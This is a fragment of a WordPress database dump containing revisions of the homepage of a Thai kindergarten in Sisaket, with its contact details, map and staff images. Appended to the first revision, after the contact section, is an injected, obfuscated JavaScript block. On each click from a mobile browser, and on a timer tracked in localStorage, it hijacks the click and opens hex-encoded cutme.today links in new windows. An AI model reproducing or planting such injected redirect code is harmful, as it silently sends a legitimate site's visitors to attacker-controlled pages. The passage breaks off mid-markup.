500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-07-15 16:07:35','2025-07-15 09:07:35','',19,'http://watprato.ssk.in.th/?p=706',0,'revision','',0),
(707,1,'2025-07-15 16:10:20','2025-07-15 09:10:20','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a 